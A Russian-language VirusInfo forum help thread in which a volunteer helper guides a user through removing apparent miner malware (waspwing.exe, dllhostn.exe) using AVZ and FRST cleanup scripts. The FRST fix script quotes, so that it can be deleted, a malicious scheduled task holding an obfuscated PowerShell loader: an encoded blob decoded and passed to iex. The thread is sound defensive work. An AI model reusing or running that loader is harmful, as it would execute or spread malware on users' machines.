Показано с 1 по 9 из 9.

waspwing.exe нагружает ЦП до 100% (заявка № 227395)

  1. #1
    Junior Member Репутация
    Регистрация
    30.11.2021
    Сообщений
    4
    Вес репутации
    15

    waspwing.exe нагружает ЦП до 100%

    Здравствуйте! В последнее время стал замечать, что периодически очень сильно тормозит комп. В диспетчере заметил несколько процессов waspwing.exe, которые практически сразу исчезали, но всегда возвращались в итоге. Можно ли с этим сделать что-то? Логи прикрепляю.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) Zunate, спасибо за обращение на наш форум!

    Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:
    Код:
    begin
     ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     QuarantineFile('C:\ProgramData\windows\dlchosts.exe', '');
     QuarantineFile('C:\ProgramData\windows\profile\dllhostn.exe', '');
     QuarantineFile('C:\ProgramData\windows\profile\service.exe', '');
     DeleteFile('C:\ProgramData\windows\dlchosts.exe', '');
     DeleteFile('C:\ProgramData\windows\profile\dllhostn.exe', '');
     DeleteFile('C:\ProgramData\windows\profile\service.exe', '');
     DeleteFileMask('c:\programdata\windows', '*', true);
     DeleteDirectory('c:\programdata\windows');
     DeleteSchedulerTask('Microsoft\Windows\LanguageComponentsInstaller\LanguageComponentsInstaller');
     DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinNAT');
     DeleteSchedulerTask('Microsoft\Windows\MUI\681861464');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 3, 3, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

    Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

    Нажмите кнопку Сканировать.

    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    30.11.2021
    Сообщений
    4
    Вес репутации
    15
    Сделано
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Выделите и скопируйте в буфер обмена следующий код:
    Код:
    Start::
    CreateRestorePoint:
    HKLM-x32\...\Run: [] => [X]
    Task: {117E2D01-1275-4560-90E9-A34BB4EE69A3} - \Microsoft\Windows\DiskFootprint\StorageSense -> Нет файла <==== ВНИМАНИЕ
    Task: {12514C9A-1DE5-40CE-B66C-D6838DA9A169} - \Microsoft\Windows\CloudExperienceHost\CreateObjectTask -> Нет файла <==== ВНИМАНИЕ
    Task: {36A78C3E-A142-4F86-903E-AE26291F646C} - \Microsoft\Windows\Autochk\Proxy -> Нет файла <==== ВНИМАНИЕ
    Task: {3A4032F6-6063-4D54-BAE3-F8A4A5110CDA} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver -> Нет файла <==== ВНИМАНИЕ
    Task: {3D363385-64B8-4207-AC46-3EE180DD87F2} - \Microsoft\Windows\Application Experience\StartupAppTask -> Нет файла <==== ВНИМАНИЕ
    Task: {53FE559C-30AB-4515-B492-C8B30F409C83} - \Microsoft\Windows\Application Experience\AitAgent -> Нет файла <==== ВНИМАНИЕ
    Task: {54D4D29C-744B-42E7-AD2C-11F44FB5A509} - \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask -> Нет файла <==== ВНИМАНИЕ
    Task: {69D15B8E-729C-4C1C-A0E7-6DCA5E963E60} - \Microsoft\Windows\DUSM\dusmtask -> Нет файла <==== ВНИМАНИЕ
    Task: {701473A3-4C61-4063-AAC6-871E22A29FE7} - \Microsoft\Windows\Maps\MapsToastTask -> Нет файла <==== ВНИМАНИЕ
    Task: {73469C3A-0B60-4A11-AD8A-FC67A901B741} - \Microsoft\Windows\Application Experience\ProgramDataUpdater -> Нет файла <==== ВНИМАНИЕ
    Task: {7572B7F9-BE9D-43BF-9A4E-F82023EDBD33} - \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip -> Нет файла <==== ВНИМАНИЕ
    Task: {7617E03F-109E-435B-9B4C-0282CD5BE4A9} - \Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload -> Нет файла <==== ВНИМАНИЕ
    Task: {7A5AFDB2-56EC-4352-AB44-069E7BF253A8} - \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser -> Нет файла <==== ВНИМАНИЕ
    Task: {92FFE795-C628-4324-AB97-06F804352DB6} - \Microsoft\Windows\Feedback\Siuf\DmClient -> Нет файла <==== ВНИМАНИЕ
    Task: {C9EC268B-1D36-4AF0-A1EB-2C1BC3B455D9} - \Microsoft\Windows\DiskFootprint\Diagnostics -> Нет файла <==== ВНИМАНИЕ
    Task: {E577C99D-E5DD-43E8-9E9F-2D291B431572} - \Microsoft\Windows\Maps\MapsUpdateTask -> Нет файла <==== ВНИМАНИЕ
    Task: {ED04DE68-EAB7-4F40-A0E9-416E8CADBDAF} - System32\Tasks\Microsoft\Windows\TPM\TPM => powershell.exe -c "$icmyN='u322Uu0kqgymIuMA5QPWTM9ZtDrARJgs0nSfOeJEy1bOBNozhRf4YpFLtQaNS8hx6SDte+Mb1EK5VKFSvUXWUrIu1VLdI7440zDYG4Nb2QSKWtNL62iTApcG1xfqO/4A+3XvB9IQ5xKwCbRZkUK5fo4Oi2X1foY0y13RUt8Rl0jYEaAjmFjfDYwJ8z2vAqJPyBuPFOoPoS7sCdY353qpBZlk+WKcSZcc4kHIEY4F1ED5LsdBiU24CfN7/DHqYPQwmQTmEOoD/UDcBuN0iAXTNe4/vWfIVOBUyB6OXd4p432VCZcC1lCxJKlLu2a1Eo4P9xuyRO4RlwLjdMEQ0zXuP7tx31DIUMgglQmSEKJFlQufKqkg8XDbH/Z67yaZDOoF7hTsQNwEuTyJTq906EONZ91Jz0DIWNNbgUD9Osxe3xLEA78w/kv2crNGjU7cFu4U/A67D+Z9202GdLwi2CaEXYVDkFSUFZAItyOWWM1YnwrtPK8DoiCgRo9Aog7qQK0Xw0TxM9BJk2XuaJMwwxv6QNkCkw6bOddqnRGTPsNf/nb4WMR5+haUPbVY/Q/8E5xIsX3MSrN8/WWASZcc0lrDWKENnRDkWsZfvknRQew9olm2P7lMnw/iQLQ7xxiMTsZWqD3SK850m3vBUMQbiR7THLMR+CqyEJcPwkHqKakY62DrWNNPqwygCedM1hDqaMQT1SC6eNUwxASaF9xNnEDYEax8jASJApRNu3WnVP04vwHVROgO4ALoEcIJ8iXfAsZQ+HWacd5Vj2fCI44SlQrrL9VehliQA7c8rwGxR+8DiBX8IeAE7F3VBfM4yFDaOLw8iXrJBokXxADaTZIBrDfVTIBHnli3Wu4Hslv5CJkD+0KiNPANnS7jdZ5Au2jvZY15g3XEUNgCkxSFSs91hRWPDJ4X/mTjCbFGyCO/EvYS+w/aGIoW63ueMJp+6niMcd8PmhfKXrwSkwnUapA2jxGQC/g8qUzNR9opmRnZA+MV7EPELe18jgydYqJ13kHrb+ZRmQLOWJMT6W27Bq5UiiPeQvk60yDYIKQVvVe8Ftg0vivFSY0HnGHVfLok5wnrBeJbr1CyCepkugKiJMok3E78APN+7y+lMeYs/jT+RJYGx3CoDKVQ+CGrUf8VmHuaW9EMrjPVU80wzAaQINBM7TXUIukHzFnNCt4E3xaLKOxyyy6kPvVDn0f+Z8lV3ALPIp4zp3GICa81nj/+XcAq93jMFc0Z+VKyXKYwlwT3dI4T1i3ZaZh7w0PPR5MxqyG+WKNChBWUDZwL6yq3X81H2imZGdkD4xXsQ9pJuXGdSMx2skeNZsRA2HfMBJtIpwb1c5k+pj6iBvd1+SvCSb8LjEynLOoXpDKaCud7j0DFReVhjVrMS8QT/gmJFJkJolSZBo4RkBHmOsgC5mTvDZsS7hLnGacusCGzW4kZmGXzQo1m20/CVv0ClRaVAOl11UmgMIAW63HmXtx79RSZEvs/tVrPD5cNwHmIBd4lz2WafcNBiRfcXrIFnQDpdY8+2RCcEbJ35B/0ff5AoUmmS/QC+xiZC7llhh2LcOhygDT2ddhA2RWXTrIB+CmvCpgInBHsOtgf/H/+FrkY7Af/FOASlj35cZ1IzE6yVJB3yFbVWsIe1CWOFuN1vwqfBtlI8XGrQa4kq1bVG6sIol24RoUd4XmPA4Bq4TWZKZ0dhVmGTctbrxDtdYhIqA+cAO80ph2/JatZgR2rPexduUbcP+El0w6NZrF+in7IRdUT/gmJFJkJok6zS6gXiwD+edkV/nD+ENRE/kzIBf0vnRPyd5UTjULoY411wA6IGoReqAWdANhouQufS9Be9nKjVMB3shnYP+xf1DPwDowF7zavBZBlslSGd8JCyF3KLcBaqTDKP9IinheqEe195Re3PP8Hn0CnOdwZ+gmdDaxblA6edO5ltS6XYNNcwDKbE5lSuFSIF5INnk27S+hZtjSzRpVLrVS4C78XjBnqOtJJwT/vZIpn2VTIXcpYyEnHP/9zjgyVBKRB8CmtC7tL+B6VBfcewBX9UKsU8HGVB5Uq9XfANYlJiEiJH8dCzEbxYdRBjkjbQ+4pqVvEYekLoVq1J/wD6A2dJONsmjOcY/V/jzz2Zc5d2xWIFKFetlOTJ5oQnFOrR/8C9nr8StQE6gGvSNIugRP2fZZOvHTkZcZRw0XOV8QenT3GXtlTul3VJJwR3W3/Few8vw3SE/oA/BT7FJYHqijXQLNC5WKcccAI7FLZGKdaxinladRQy1PJSb8w5F7TcfUFiAimS6ZJqVXcCak6zQudJOVjo3OVQYMahFnTSYAr+XPRK44PlV7i';$fZba='yvVeiCAxUPhiv';$cKQC=($fZba[4]+$fZba[3]+$fZba[7]);&$cKQC(&$cKQC ('''[TeoIrtxt.EncooIrtding]::UToIrtF''+2*2*2+''.GeoIrttStoIrtring([ConoIrtvert]::Fro''+''moIrtB''+''ase''+8*8+''StrioIrtng(([reoIrtgex]:oIrt:MaoIrttchoIrtes(''''==QKp8GT4FEJocmb0JXSvlmc0JXSvR3U0VGdyl0bH5COGRncJ9GVVpjOddmbpRncJ9GZvNGdyl0buVkL0hHdyl0blRlLtVGd0JXSvNXe0JXSvN1WogHdyl0blRncJ9Wa7kiclJGdyl0btVnbsRncJ9WYpJXZT5iZI5mQZJ2bksyJgcyKsVGZ0JXSv9WTuYGSuJUWi9GJoASKp4UetNWakgyZulmc0RncJ92U0QncJ9mNlNXY0JXSvJUbvRncJ9mcGpjOdRnclZHdyl0bu92Qu0WZ0RncJ92c5N1WoAyY0JXSvVGZ98GT4FEJ7IXZi1Gdyl0b15GbhlGdyl0byV2UswWZ0JXSvR2bNBCdjVGdyl0bsV2c813JwUkVJJFRMFEdyl0bDl0UZhEUc5CXcdCIxVWLgQUSlRncJ92YpZXZE5yXksHIlJHdyl0blh2d8VmdpRncJ9mcktGdyl0bzlGZfJzM0JXSv5Wa0JXSvdHIp1Gdyl0b3dWPmhkbCllYvRSf7EUQrlFJg4mc0JXSvVHdlJXfrsiZI5mQZRyOUt2VxRCIy9Gei1CIdZGSuJUWksFWipGZkAicvRncJ9Gei1CIdtUeapmZyRyWBF0aZRSPdtUeapmZyRyWBF0aZRyOUt2VxRCIy9Gdyl0b4JWLgkiM1EDIy9mYtACVrdVckACZuRncJ9WYi1CIzIDK9Q1aXFHJ9BTPmhkbClFJ7lCduV3bD5CWipGZkASZn1CImhkbClFJoYWa7lyKrsUeapmZyRyO05WdvNkLBF0aZRCI0xWLgsUeapmZyRyOw0zS5plamJHJoI3b0JXSvZ2Ow0jZI5mQZRyOdBzWYJmakRSPUt2VxRyOpkXQntWaVRCKzVGdyl0b0lnQ0RncJ9WZH5COGRVV6oTXn5Gdyl0bpR2bj5WRuQHdyl0b4VGVu0WZ0JXSvR3c5N1W9glYqRGJ7lSeBd2apVFJddmbpJHdyl0b0N3WsEUQrlFJd11WlRHdyl0b5J2WoMWZ0JXSvRGIu9Wa0NGdyl0buVnZ'''',''''.'''',''''RioIrtghoIrttToIrtoLoIrteft'''')|FooIrtrEaoIrtch {$oIrt_oIrt.valoIrtue}) -joIrto''+''in ''''''''))-repoIrtlace''''ooIrtIrt''''|&(''''ioIrteoIrtx'''');''-'+'rep'+'lace''oIrt'''))" -c "$icmyN='u322Uu0kqgymIuMA5QPWTM9ZtDrARJgs0nSfOeJEy1bOBNozhRf4YpFLtQaNS8hx6SDte+Mb1EK5VKFSvUXWUrIu1VLdI7440zDYG4Nb2QSKWtNL62iTApcG1xfqO/4A+3XvB9IQ5xKwCbRZkUK5fo4Oi2X1foY0y13RUt8Rl0jYEaAjmFjfDYwJ8z2vAqJPyBuPFOoPoS7sCdY353qpBZlk+WKcSZcc4kHIEY4F1ED5LsdBiU24CfN7/DHqYPQwmQTmEOoD/UDcBuN0iAXTNe4/vWfIVOBU (запись имеет ещё 3507 символов). (Нет файла)
    Task: {ED77AEE0-EAFB-4133-B544-9E7C5632D902} - \Microsoft\Windows\Customer Experience Improvement Program\Consolidator -> Нет файла <==== ВНИМАНИЕ
    CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
    CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
    2021-11-24 00:56 - 2021-11-24 00:56 - 1063345664 _____ C:\Windows\MEMORY.DMP
    2021-11-24 00:56 - 2021-11-24 00:56 - 000798308 _____ C:\Windows\Minidump\112421-8187-01.dmp
    2021-11-08 20:30 - 2021-11-08 20:30 - 000000022 _____ C:\quarantine.zip
    021-11-30 22:44 - 2021-05-09 08:25 - 000000000 _RSHD C:\ProgramData\Windows
    ContextMenuHandlers1: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} =>  -> Нет файла
    ContextMenuHandlers4: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} =>  -> Нет файла
    IE trusted site: HKU\S-1-5-21-3474453275-868908962-3883695755-1000\...\localhost -> localhost
    IE trusted site: HKU\S-1-5-21-3474453275-868908962-3883695755-1000\...\webcompanion.com -> hxxp://webcompanion.com
    FirewallRules: [{46F45B35-1A1C-4F01-BCB5-89FF4310E840}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe => Нет файла
    FirewallRules: [{044220AA-C143-4A51-B3BC-3F94DDE47665}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
    FirewallRules: [{6CD8E97C-DAE7-4824-B70E-F7692E25DE24}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
    Reboot:
    End::
    Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    Сообщите, что с проблемой.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    30.11.2021
    Сообщений
    4
    Вес репутации
    15
    Сделано
    Пока что не наблюдал процесса в диспетчере, но судить сложно. Возможно, что решение помогло.
    Вложения Вложения

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    30.11.2021
    Сообщений
    4
    Вес репутации
    15
    Готово
    Вложения Вложения

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Контроль учётных записей пользователя отключен
    Рекомендую ознакомиться со статьёй Так ли страшен контроль учетных записей (UAC)? и включить.

    Обновите софт:
    7-Zip 21.01 alpha (x64) v.21.01 alpha Внимание! Скачать обновления
    ^Удалите старую версию, скачайте и установите новую.^
    Java 8 Update 291 v.8.0.2910.10 Внимание! Скачать обновления
    ^Удалите старую версию и установите новую (jre-8u311-windows-i586.exe)^
    Adobe Acrobat DC v.21.001.20145 Внимание! Скачать обновления
    ^Проверьте обновления через меню Справка - Проверить обновления!^
    WBR,
    Vadim

Похожие темы

  1. Ответов: 7
    Последнее сообщение: 26.05.2017, 20:52
  2. Ответов: 14
    Последнее сообщение: 11.08.2013, 21:31
  3. Процесс "Explorer.exe" нагружает процессор на 100 %
    От Roswell1947 в разделе Помогите!
    Ответов: 6
    Последнее сообщение: 11.11.2011, 16:45
  4. Explorer.exe нагружает процессор на 100%
    От ГитКЗ в разделе Помогите!
    Ответов: 30
    Последнее сообщение: 22.04.2011, 13:12
  5. svchost.exe нагружает процессор на 100%
    От dima39rus в разделе Помогите!
    Ответов: 8
    Последнее сообщение: 11.05.2010, 22:32

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01041 seconds with 19 queries